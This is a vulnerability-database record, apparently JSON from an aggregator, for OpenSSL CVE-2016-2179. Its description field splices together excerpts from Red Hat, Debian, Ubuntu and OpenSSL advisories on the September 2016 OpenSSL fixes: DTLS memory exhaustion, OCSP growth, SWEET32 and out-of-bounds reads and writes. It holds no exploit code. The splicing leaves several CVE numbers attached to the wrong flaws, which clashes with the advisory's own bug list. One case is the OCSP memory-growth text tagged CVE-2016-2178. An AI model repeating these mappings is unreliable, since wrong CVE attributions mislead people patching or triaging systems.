"CVE-2016-2179", "impactScore": null, "integrityImpact": "None", "privilegesRequired": "None", "scope": "Unchanged", "trust": 0.8, "userInteraction": "None", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0" } ], "severity": [ { "author": "NVD", "id": "CVE-2016-2179", "trust": 1.8, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201609-103", "trust": 0.6, "value": "HIGH" }, { "author": "VULMON", "id": "CVE-2016-2179", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-2179" }, { "db": "JVNDB", "id": "JVNDB-2016-004778" }, { "db": "NVD", "id": "CVE-2016-2179" }, { "db": "CNNVD", "id": "CNNVD-201609-103" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The DTLS implementation in OpenSSL before 1.1.0 does not properly restrict the lifetime of queue entries associated with unused out-of-order messages, which allows remote attackers to cause a denial of service (memory consumption) by maintaining many crafted DTLS sessions simultaneously, related to d1_lib.c, statem_dtls.c, statem_lib.c, and statem_srvr.c. OpenSSL is prone to multiple denial-of-service vulnerabilities. \nAn attacker can exploit these issues to cause a denial-of-service condition. \nVersions prior to OpenSSL 1.1.0 are vulnerable. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: openssl security update\nAdvisory ID: RHSA-2016:1940-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2016-1940.html\nIssue date: 2016-09-27\nCVE Names: CVE-2016-2177 CVE-2016-2178 CVE-2016-2179 \n CVE-2016-2180 CVE-2016-2181 CVE-2016-2182 \n CVE-2016-6302 CVE-2016-6304 CVE-2016-6306 \n=====================================================================\n\n1. Summary:\n\nAn update for openssl is now available for Red Hat Enterprise Linux 6 and\nRed Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Desktop (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux HPC Node (v. 6) - x86_64\nRed Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64\nRed Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. Description:\n\nOpenSSL is a toolkit that implements the Secure Sockets Layer (SSL) and\nTransport Layer Security (TLS) protocols, as well as a full-strength\ngeneral-purpose cryptography library. A remote attacker\ncould cause a TLS server using OpenSSL to consume an excessive amount of\nmemory and, possibly, exit unexpectedly after exhausting all available\nmemory, if it enabled OCSP stapling support. \n(CVE-2016-2178)\n\n* It was discovered that the Datagram TLS (DTLS) implementation could fail\nto release memory in certain cases. A malicious DTLS client could cause a\nDTLS server using OpenSSL to consume an excessive amount of memory and,\npossibly, exit unexpectedly after exhausting all available memory. A remote attacker could possibly use this flaw\nto make a DTLS server using OpenSSL to reject further packets sent from a\nDTLS client over an established DTLS connection. (CVE-2016-2181)\n\n* An out of bounds write flaw was discovered in the OpenSSL BN_bn2dec()\nfunction. (CVE-2016-2182)\n\n* A flaw was found in the DES/3DES cipher was used as part of the TLS/SSL\nprotocol. A man-in-the-middle attacker could use this flaw to recover some\nplaintext data by capturing large amounts of encrypted traffic between\nTLS/SSL server and client if the communication used a DES/3DES based\nciphersuite. (CVE-2016-2183)\n\nThis update mitigates the CVE-2016-2183 issue by lowering priority of DES\ncipher suites so they are not preferred over cipher suites using AES. For\ncompatibility reasons, DES cipher suites remain enabled by default and\nincluded in the set of cipher suites identified by the HIGH cipher string. \nFuture updates may move them to MEDIUM or not enable them by default. \n\n* An integer underflow flaw leading to a buffer over-read was found in the\nway OpenSSL parsed TLS session tickets. (CVE-2016-6302)\n\n* Multiple integer overflow flaws were found in the way OpenSSL performed\npointer arithmetic. A remote attacker could possibly use these flaws to\ncause a TLS/SSL server or client using OpenSSL to crash. (CVE-2016-2177)\n\n* An out of bounds read flaw was found in the way OpenSSL formatted Public\nKey Infrastructure Time-Stamp Protocol data for printing. An attacker could\npossibly cause an application using OpenSSL to crash if it printed time\nstamp data from the attacker. A remote attacker could\npossibly use these flaws to crash a TLS/SSL server or client using OpenSSL. \n(CVE-2016-6306)\n\nRed Hat would like to thank the OpenSSL project for reporting CVE-2016-6304\nand CVE-2016-6306 and OpenVPN for reporting CVE-2016-2183. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nFor the update to take effect, all services linked to the OpenSSL library\nmust be restarted, or the system rebooted. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1341705 - CVE-2016-2177 openssl: Possible integer overflow vulnerabilities in codebase\n1343400 - CVE-2016-2178 openssl: Non-constant time codepath followed for certain operations in DSA implementation\n1359615 - CVE-2016-2180 OpenSSL: OOB read in TS_OBJ_print_bio()\n1367340 - CVE-2016-2182 openssl: Out-of-bounds write caused by unchecked errors in BN_bn2dec()\n1369113 - CVE-2016-2181 openssl: DTLS replay protection bypass allows DoS against DTLS connection\n1369383 - CVE-2016-2183 SSL/TLS: Birthday attack against 64-bit block ciphers (SWEET32)\n1369504 - CVE-2016-2179 openssl: DTLS memory exhaustion DoS when messages are not removed from fragment buffer\n1369855 - CVE-2016-6302 openssl: Insufficient TLS session ticket HMAC length checks\n1377594 - CVE-2016-6306 openssl: certificate message OOB reads\n1377600 - CVE-2016-6304 openssl: OCSP Status Request extension unbounded memory growth\n\n6. Package List:\n\nRed Hat Enterprise Linux Desktop (v. 6):\n\nSource:\nopenssl-1.0.1e-48.el6_8.3.src.rpm\n\ni386:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\n\nx86_64:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux Desktop Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-static-1.0.1e-48.el6_8.3.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-static-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node (v. 6):\n\nSource:\nopenssl-1.0.1e-48.el6_8.3.src.rpm\n\nx86_64:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux HPC Node Optional (v. 6):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-static-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 6):\n\nSource:\nopenssl-1.0.1e-48.el6_8.3.src.rpm\n\ni386:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\n\nppc64:\nopenssl-1.0.1e-48.el6_8.3.ppc.rpm\nopenssl-1.0.1e-48.el6_8.3.ppc64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.ppc.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.ppc64.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.ppc.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.ppc64.rpm\n\ns390x:\nopenssl-1.0.1e-48.el6_8.3.s390.rpm\nopenssl-1.0.1e-48.el6_8.3.s390x.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.s390.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.s390x.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.s390.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.s390x.rpm\n\nx86_64:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-static-1.0.1e-48.el6_8.3.i686.rpm\n\nppc64:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.ppc64.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.ppc64.rpm\nopenssl-static-1.0.1e-48.el6_8.3.ppc64.rpm\n\ns390x:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.s390x.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.s390x.rpm\nopenssl-static-1.0.1e-48.el6_8.3.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-static-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 6):\n\nSource:\nopenssl-1.0.1e-48.el6_8.3.src.rpm\n\ni386:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\n\nx86_64:\nopenssl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-devel-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\ni386:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.i686.rpm\nopenssl-static-1.0.1e-48.el6_8.3.i686.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-perl-1.0.1e-48.el6_8.3.x86_64.rpm\nopenssl-static-1.0.1e-48.el6_8.3.x86_64.rpm\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.7.src.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.7.src.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.7.src.rpm\n\nppc64:\nopenssl-1.0.1e-51.el7_2.7.ppc64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.ppc.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.ppc64.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.ppc.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.ppc64.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.ppc.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.ppc64.rpm\n\nppc64le:\nopenssl-1.0.1e-51.el7_2.7.ppc64le.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.ppc64le.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.ppc64le.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.ppc64le.rpm\n\ns390x:\nopenssl-1.0.1e-51.el7_2.7.s390x.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.s390.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.s390x.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.s390.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.s390x.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.s390.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.s390x.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.ppc.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.ppc64.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.ppc64.rpm\nopenssl-static-1.0.1e-51.el7_2.7.ppc.rpm\nopenssl-static-1.0.1e-51.el7_2.7.ppc64.rpm\n\nppc64le:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.ppc64le.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.ppc64le.rpm\nopenssl-static-1.0.1e-51.el7_2.7.ppc64le.rpm\n\ns390x:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.s390.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.s390x.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.s390x.rpm\nopenssl-static-1.0.1e-51.el7_2.7.s390.rpm\nopenssl-static-1.0.1e-51.el7_2.7.s390x.rpm\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nopenssl-1.0.1e-51.el7_2.7.src.rpm\n\nx86_64:\nopenssl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-devel-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-libs-1.0.1e-51.el7_2.7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nopenssl-debuginfo-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-debuginfo-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-perl-1.0.1e-51.el7_2.7.x86_64.rpm\nopenssl-static-1.0.1e-51.el7_2.7.i686.rpm\nopenssl-static-1.0.1e-51.el7_2.7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2016-2177\nhttps://access.redhat.com/security/cve/CVE-2016-2178\nhttps://access.redhat.com/security/cve/CVE-2016-2179\nhttps://access.redhat.com/security/cve/CVE-2016-2180\nhttps://access.redhat.com/security/cve/CVE-2016-2181\nhttps://access.redhat.com/security/cve/CVE-2016-2182\nhttps://access.redhat.com/security/cve/CVE-2016-6302\nhttps://access.redhat.com/security/cve/CVE-2016-6304\nhttps://access.redhat.com/security/cve/CVE-2016-6306\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://www.openssl.org/news/secadv/20160922.txt\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2016 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFX6nnFXlSAg2UNWIIRAqklAJ9uGMit/wxZ0CfuGjR7Vi2+AjmGMwCfTpEI\nxpTW7ApBLmKhVjs49DGYouI=\n=4VgY\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. Additional information can be found at\n https://www.openssl.org/blog/blog/2016/06/27/undefined-pointer-arithmetic/ \n\nCVE-2016-2178\n\n Cesar Pereida, Billy Brumley and Yuval Yarom discovered a timing\n leak in the DSA code. \n\nCVE-2016-2179 / CVE-2016-2181\n\n Quan Luo and the OCAP audit team discovered denial of service\n vulnerabilities in DTLS. \n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 1.0.1t-1+deb8u4. \n\nFor the unstable distribution (sid), these problems will be fixed soon. ==========================================================================\nUbuntu Security Notice USN-3087-2\nSeptember 23, 2016\n\nopenssl regression\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 16.04 LTS\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n\nSummary:\n\nUSN-3087-1 introduced a regression in OpenSSL. The fix for CVE-2016-2182 was\nincomplete and caused a regression when parsing certificates. This update\nfixes the problem. \n\nWe apologize for the inconvenience. This\n issue has only been addressed in Ubuntu 16.04 LTS in this update. (CVE-2016-2178)\n Quan Luo discovered that OpenSSL did not properly restrict the lifetime\n of queue entries in the DTLS implementation. (CVE-2016-2181)\n Shi Lei discovered that OpenSSL incorrectly validated division results. \n (CVE-2016-2182)\n Karthik Bhargavan and Gaetan Leurent discovered that the DES and Triple DES\n ciphers were vulnerable to birthday attacks. \n (CVE-2016-2183)\n Shi Lei discovered that OpenSSL incorrectly handled certain ticket lengths. (CVE-2016-6303)\n Shi Lei discovered that OpenSSL incorrectly performed certain message\n length checks. (CVE-2016-6306)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 16.04 LTS:\n libssl1.0.0 1.0.2g-1ubuntu4.5\n\nUbuntu 14.04 LTS:\n libssl1.0.0 1.0.1f-1ubuntu2.21\n\nUbuntu 12.04 LTS:\n libssl1.0.0 1.0.1-4ubuntu5.38\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \nOpenSSL Security Advisory [22 Sep 2016]\n========================================\n\nOCSP Status Request extension unbounded memory growth (CVE-2016-6304)\n=====================================================================\n\nSeverity: High\n\nA malicious client can send an excessively large OCSP Status Request extension. \nIf that client continually requests renegotiation, sending a large OCSP Status\nRequest extension each time, then there will be unbounded memory growth on the\nserver. This will eventually lead to a Denial Of Service attack through memory\nexhaustion. Servers with a default configuration are vulnerable even if they do\nnot support OCSP. Builds using the \"no-ocsp\" build time option are not affected. \n\nServers using OpenSSL versions prior to 1.0.1g are not vulnerable in a default\nconfiguration, instead only if an application explicitly enables OCSP stapling\nsupport. \n\nOpenSSL 1.1.0 users should upgrade to 1.1.0a\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 29th August 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Matt Caswell of the OpenSSL\ndevelopment team. \n\nSSL_peek() hang on empty record (CVE-2016-6305)\n===============================================\n\nSeverity: Moderate\n\nOpenSSL 1.1.0 SSL/TLS will hang during a call to SSL_peek() if the peer sends an\nempty record. This could be exploited by a malicious peer in a Denial Of Service\nattack. \n\nOpenSSL 1.1.0 users should upgrade to 1.1.0a\n\nThis issue was reported to OpenSSL on 10th September 2016 by Alex Gaynor. The\nfix was developed by Matt Caswell of the OpenSSL development team. \n\nSWEET32 Mitigation (CVE-2016-2183)\n==================================\n\nSeverity: Low\n\nSWEET32 (https://sweet32.info) is an attack on older block cipher algorithms\nthat use a block size of 64 bits. In mitigation for the SWEET32 attack DES based\nciphersuites have been moved from the HIGH cipherstring group to MEDIUM in\nOpenSSL 1.0.1 and OpenSSL 1.0.2. OpenSSL 1.1.0 since release has had these\nciphersuites disabled by default. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 16th August 2016 by Karthikeyan\nBhargavan and Gaetan Leurent (INRIA). The fix was developed by Rich Salz of the\nOpenSSL development team. \n\nOOB write in MDC2_Update() (CVE-2016-6303)\n==========================================\n\nSeverity: Low\n\nAn overflow can occur in MDC2_Update() either if called directly or\nthrough the EVP_DigestUpdate() function using MDC2. If an attacker\nis able to supply very large amounts of input data after a previous\ncall to EVP_EncryptUpdate() with a partial block then a length check\ncan overflow resulting in a heap corruption. \n\nThe amount of data needed is comparable to SIZE_MAX which is impractical\non most platforms. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 11th August 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL\ndevelopment team. \n\nMalformed SHA512 ticket DoS (CVE-2016-6302)\n===========================================\n\nSeverity: Low\n\nIf a server uses SHA512 for TLS session ticket HMAC it is vulnerable to a\nDoS attack where a malformed ticket will result in an OOB read which will\nultimately crash. \n\nThe use of SHA512 in TLS session tickets is comparatively rare as it requires\na custom server callback and ticket lookup mechanism. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 19th August 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL\ndevelopment team. \n\nOOB write in BN_bn2dec() (CVE-2016-2182)\n========================================\n\nSeverity: Low\n\nThe function BN_bn2dec() does not check the return value of BN_div_word(). \nThis can cause an OOB write if an application uses this function with an\noverly large BIGNUM. This could be a problem if an overly large certificate\nor CRL is printed out from an untrusted source. TLS is not affected because\nrecord limits will reject an oversized certificate before it is parsed. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 2nd August 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL\ndevelopment team. \n\nOOB read in TS_OBJ_print_bio() (CVE-2016-2180)\n==============================================\n\nSeverity: Low\n\nThe function TS_OBJ_print_bio() misuses OBJ_obj2txt(): the return value is\nthe total length the OID text representation would use and not the amount\nof data written. This will result in OOB reads when large OIDs are presented. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 21st July 2016 by Shi Lei (Gear Team,\nQihoo 360 Inc.). The fix was developed by Stephen Henson of the OpenSSL\ndevelopment team. \n\nPointer arithmetic undefined behaviour (CVE-2016-2177)\n======================================================\n\nSeverity: Low\n\nAvoid some undefined pointer arithmetic\n\nA common idiom in the codebase is to check limits in the following manner:\n\"p + len \u003e limit\"\n\nWhere \"p\" points to some malloc\u0027d data of SIZE bytes and\nlimit == p + SIZE\n\n\"len\" here could be from some externally supplied data (e.g. from a TLS\nmessage). \n\nThe rules of C pointer arithmetic are such that \"p + len\" is only well\ndefined where len \u003c= SIZE. Therefore the above idiom is actually\nundefined behaviour. \n\nFor example this could cause problems if some malloc implementation\nprovides an address for \"p\" such that \"p + len\" actually overflows for\nvalues of len that are too big and therefore p + len \u003c limit. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 4th May 2016 by Guido Vranken. The\nfix was developed by Matt Caswell of the OpenSSL development team. \n\nConstant time flag not preserved in DSA signing (CVE-2016-2178)\n===============================================================\n\nSeverity: Low\n\nOperations in the DSA signing algorithm should run in constant time in order to\navoid side channel attacks. A flaw in the OpenSSL DSA implementation means that\na non-constant time codepath is followed for certain operations. This has been\ndemonstrated through a cache-timing attack to be sufficient for an attacker to\nrecover the private DSA key. \n\nOpenSSL 1.0.2 users should upgrade to 1.0.2i\nOpenSSL 1.0.1 users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 23rd May 2016 by C\u00e9sar Pereida (Aalto\nUniversity), Billy Brumley (Tampere University of Technology), and Yuval Yarom\n(The University of Adelaide and NICTA). The fix was developed by C\u00e9sar Pereida. \n\nDTLS buffered message DoS (CVE-2016-2179)\n=========================================\n\nSeverity: Low\n\nIn a DTLS connection where handshake messages are delivered out-of-order those\nmessages that OpenSSL is not yet ready to process will be buffered for later\nuse. Under certain circumstances, a flaw in the logic means that those messages\ndo not get removed from the buffer even though the handshake has been completed. \nAn attacker could force up to approx. 15 messages to remain in the buffer when\nthey are no longer required. These messages will be cleared when the DTLS\nconnection is closed. The default maximum size for a message is 100k. Therefore\nthe attacker could force an additional 1500k to be consumed per connection. By\nopening many simulataneous connections an attacker could cause a DoS attack\nthrough memory exhaustion. \n\nOpenSSL 1.0.2 DTLS users should upgrade to 1.0.2i\nOpenSSL 1.0.1 DTLS users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 22nd June 2016 by Quan Luo. The fix was\ndeveloped by Matt Caswell of the OpenSSL development team. \n\nDTLS replay protection DoS (CVE-2016-2181)\n==========================================\n\nSeverity: Low\n\nA flaw in the DTLS replay attack protection mechanism means that records that\narrive for future epochs update the replay protection \"window\" before the MAC\nfor the record has been validated. This could be exploited by an attacker by\nsending a record for the next epoch (which does not have to decrypt or have a\nvalid MAC), with a very large sequence number. This means that all subsequent\nlegitimate packets are dropped causing a denial of service for a specific\nDTLS connection. \n\nOpenSSL 1.0.2 DTLS users should upgrade to 1.0.2i\nOpenSSL 1.0.1 DTLS users should upgrade to 1.0.1u\n\nThis issue was reported to OpenSSL on 21st November 2015 by the OCAP audit team. 